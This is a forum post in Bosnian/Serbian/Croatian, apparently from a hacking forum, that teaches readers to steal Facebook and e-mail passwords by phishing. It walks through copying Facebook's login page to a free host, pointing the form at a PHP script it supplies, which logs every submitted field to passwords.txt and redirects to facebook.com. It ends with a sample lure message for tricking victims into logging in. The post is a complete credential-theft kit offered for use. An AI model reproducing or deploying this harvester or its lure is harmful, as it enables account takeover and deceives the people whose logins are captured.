Jooooj ljudi sta mislite da je dovoljno da bi hackovao nekome mail,facebook,myspace il' nesto slicno sam oda ukucati e-mail od zrtve i da kliknete par puta i da ce te dobiti pw ???? :S
Ma zajeb....Msm naravno da ima nacina kako da hakujete neciji pw od maila i sl. npr. ja sam koristo najcesce phishere za one koji ne znaju phisheri su lazne login stranice ..Znaci odes na nekakav besplatan hosting napravis svoj acc..Odes npr. na facebook i kopiras source kod od facebook login stranice i zaljepis na svom hostu u novom fajlu koji se zove "login.hmt" dalje imas po netu raznih phishera evo jedan od mene koji sam ja koristio :
Kod:
<?php
header ('Location: http://facebook.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
i to sacuvate pod imenom phish.php
Sad se vratite na vas login.htm file i kliknite edit.
Pritisnite CTRL+F i ukucajte u search polje(opcija koja je nastala koriscenjem CTRL+F ) "action=" (bez navodnika) i pritiscite Find dok nedodjete do djela o logovanju...Obicno pise "action=login.php ...U svakom slucaju ce te prepoznati. i zamjenite deo iza action= sa phish.php i snimite.
Logovanjem zrtve ce se napraviti password.txt file u kome ce se nalaziti login podaci.
znaci za ovo vam je potrebna dobra prica ....Znaci zrtvu treba da nagovorite da se loguje na tu stranicu e sada to prepusam vasoj masti

Npr:Evo pogeldaj ovaj novi facebook super je ,imas da mjenjas svoje layote i svakavke dodatne stvari ja ga koristim vec duze vrijeme i ne kontam da se vracam na taj obicni ...pa reko da ti javim ne zna za ovo puno ljudi al' eto tebi
ta je meni prica posluzila ...a to najbolje da sami skontate nesto !